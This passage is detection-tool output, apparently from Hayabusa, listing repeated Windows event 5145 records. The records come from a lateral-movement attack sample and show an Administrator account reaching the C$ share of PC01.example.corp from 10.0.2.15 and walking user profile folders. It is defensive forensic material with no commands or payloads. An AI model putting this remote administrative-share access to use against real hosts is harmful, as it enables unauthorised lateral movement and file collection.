10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.696 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.696 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.696 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.696 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.706 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.716 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.716 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.716 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.716 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.716 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.727 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.737 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.747 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.747 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.747 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.747 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.747 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.757 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.757 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches\desktop.ini | IP Addr: 
10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.757 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.757 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.757 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.767 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.767 +00:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.767 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.767 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.767 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.777 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.787 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.787 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.787 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.797 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
